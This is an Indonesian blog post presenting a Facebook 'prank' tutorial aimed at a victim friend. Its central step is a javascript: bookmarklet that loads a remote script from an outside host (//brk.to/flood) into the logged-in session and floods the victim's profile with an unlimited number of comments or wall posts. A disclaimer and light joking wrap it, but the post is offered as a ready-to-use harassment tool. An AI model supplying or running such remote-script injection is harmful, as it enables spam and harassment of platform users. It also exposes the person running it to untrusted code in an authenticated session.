CARA ISENGIN TEMAN DI FACEBOOK

permisi para Juragan Juragan.. :o

apa lo suka iseng??
Nah ini dia cara paling MANTAB buat ngisengin orang. Gue cuma mau SHARE aja ni tentang cara ngisengin temen di Facebook.
Trik ini cocok banget buat yang lagi sakit hati di Facebook :breakheart. Silahkan lo tertawa sesuka hati lo karena ini Trik yang paling mujarab yang pernah ada di seluruh jagad iseng (hhaha 4L4Y deh).:mahos
Mau ngisengin teman lo di Facebook supaya noitification mereka bejibun ribuan noitifocation ??
Paling enak nih kalo ngerjain temen yang pake BB. BBnya bakal rame ama noitification
FB.:ngakaks
Gue ada 2 cara untuk ngisengin temen kalian di Facebook.
Tapi gue ngasih tau dulu cara yang pertama yah.:Peace: 
Langung aja yaa cekibrootttt....


:present: Iseng Yang pertama 
Gue jelasin dulu,
Cara Kerja  : 
Lo bisa komen status atau ngirim Wall dengan RIBUAN komentar lo hanya dengan 1x klik!

Caranya :
1. Lo buka dulu profil temen lo (si korban)

2. copy script yang di garis bawah ini ,
javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0);

3. Ganti URL temen lu (si korban) dengan script yang di atas

4. Jadinya nih kaya gini ,

5. Entar akan muncul seperti ini , masukan jumlah komentar yang mau lo kirim. Jumlah terserah TAK TERBATAS.. (tapi jangan terlalu banyak ya. kasian tuh temen lo :))

6. Masukkan komentar yang akan anda kirim 

7. Dan terakhir tekan ENTER yang kenceng !! :hammers
 ENG ING ENG.... komentar lo akan muncul sesuai ke inginan lo ..:thumbup:
 Tunggu reaksi temen lo. :ngakaks

Gue saranin jangan terlalu banyak make Trik ini. Karena dapat mengganggu kesehatan mata, bahkan serangan jantung. :ngakaks

PESAN DARI GUE :
- gue ga bertanggung jawab sepenuhnya atas penggunaan Trik ini. ____:ngacir:
- gue cuma ingin berbagi ilmu semata-mata hanya untuk hiburan belaka.
- dan DILARANG KERAS UNTUK MENGKOPI TULISAN INI DALAM BENTUK APAPUN  TANPA SE-IZIN YANG PUNYA BLOG INI (bukannya gue sombong, tapi hargailah saya yang sudah susah payah memposting tulisan ini :berdukas. Ya.. se-engga.nya tulislah SUMBER nya dari mana. Jangan jadi PLAGIATers :tai:)
- Gunakan dengan bijak ya bro Trik ini. Jangan di salah gunakan OK.. :army:


terakir :


:kissTERIMA KASIH KARENA ANDA SUDAH MENGUNJUNGI:kissBLOG SAYA
_____________________________________________________________________



Categories:

0 komentar:

Posting Komentar

Silahkan komentar
Jangan nyampah ya :)
_______________________________________________

 

Featured Posts

PTB ZONE

Featured Posts